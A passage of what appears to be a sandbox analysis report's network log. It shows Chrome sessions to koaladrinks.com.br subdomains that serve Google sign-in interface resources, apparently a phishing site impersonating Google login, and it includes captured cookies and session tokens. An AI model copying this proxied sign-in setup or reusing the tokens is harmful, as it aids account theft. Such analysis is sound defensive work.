                                                      2025-01-10 08:27:50 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:50 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:50 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:38 GMT
                                                      2025-01-10 08:27:50 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:38 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.949773139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:50 UTC1676OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:50 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:50 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:50 UTC12INData Raw: 41 67 65 3a 20 39 34 36 38 34 0d 0a
                                                      Data Ascii: Age: 94684
                                                      2025-01-10 08:27:50 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:50 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:50 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:50 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:50 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:50 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:50 UTC37INData Raw: 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 30 39 3a 34 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Thu, 09 Jan 2025 06:09:46 GMT
                                                      2025-01-10 08:27:50 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 30 39 20 4a 61 6e 20 32 30 32 36 20 30 36 3a 30 39 3a 34 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Fri, 09 Jan 2026 06:09:46 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.949776139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:50 UTC1152OUTGET /_/bscframe HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-platform: "Windows"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: iframe
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:51 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:51 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:51 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:51 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:51 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:51 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=utf-8
                                                      2025-01-10 08:27:51 UTC89INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 53 69 67 6e 55 70 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInSignUpUi"
                                                      2025-01-10 08:27:51 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 73 69 74 65 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: same-site
                                                      2025-01-10 08:27:51 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:51 GMT
                                                      2025-01-10 08:27:51 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:51 UTC196INData Raw: 50 65 72 6d 69 73 73 69 6f 6e 73 2d 50 6f 6c 69 63 79 3a 20 63 68 2d 75 61 2d 61 72 63 68 3d 2a 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 2d 6c 69 73 74 3d 2a 2c 20 63 68 2d 75 61 2d 6d 6f 64 65 6c 3d 2a 2c 20 63 68 2d 75 61 2d 77 6f 77 36 34 3d 2a 2c 20 63 68 2d 75 61 2d 66 6f 72 6d 2d 66 61 63 74 6f 72 73 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 3d 2a 0d 0a
                                                      Data Ascii: Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.949777139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:50 UTC1845OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;N [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:51 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:51 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:51 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 32 0d 0a
                                                      Data Ascii: Age: 22932
                                                      2025-01-10 08:27:51 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:51 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:51 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:51 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:51 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:51 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:51 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 33 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:39 GMT
                                                      2025-01-10 08:27:51 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 33 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:39 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      50192.168.2.949778139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:50 UTC1265OUTPOST /v3/signin/_/AccountsSignInUi/browserinfo?f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=12469&rt=j HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 166
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      X-Same-Domain: 1
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:50 UTC166OUTData Raw: 66 2e 72 65 71 3d 25 35 42 39 25 32 43 31 25 32 43 31 25 32 43 25 35 42 6e 75 6c 6c 25 32 43 31 30 32 34 25 32 43 31 32 38 30 25 35 44 25 32 43 25 35 42 6e 75 6c 6c 25 32 43 39 30 37 25 32 43 31 32 38 30 25 35 44 25 32 43 25 35 42 31 25 32 43 31 25 32 43 6e 75 6c 6c 25 32 43 31 25 35 44 25 32 43 25 35 42 30 25 32 43 30 25 32 43 30 25 35 44 25 35 44 26 61 74 3d 41 49 6b 50 66 77 69 4f 59 50 74 2d 62 37 2d 70 76 4b 49 66 5a 51 75 79 33 6e 35 51 25 33 41 31 37 33 36 34 39 37 36 35 38 31 34 31 26
                                                      Data Ascii: f.req=%5B9%2C1%2C1%2C%5Bnull%2C1024%2C1280%5D%2C%5Bnull%2C907%2C1280%5D%2C%5B1%2C1%2Cnull%2C1%5D%2C%5B0%2C0%2C0%5D%5D&at=AIkPfwiOYPt-b7-pvKIfZQuy3n5Q%3A1736497658141&
                                                      2025-01-10 08:27:51 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:51 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:51 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:51 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:51 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:51 UTC89INData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 73 70 6f 6e 73 65 2e 62 69 6e 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 72 65 73 70 6f 6e 73 65 2e 62 69 6e 0d 0a
                                                      Data Ascii: Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                      2025-01-10 08:27:51 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:27:51 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:51 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 73 69 74 65 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: same-site
                                                      2025-01-10 08:27:51 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:51 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      51192.168.2.949780139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:51 UTC1858OUTGET 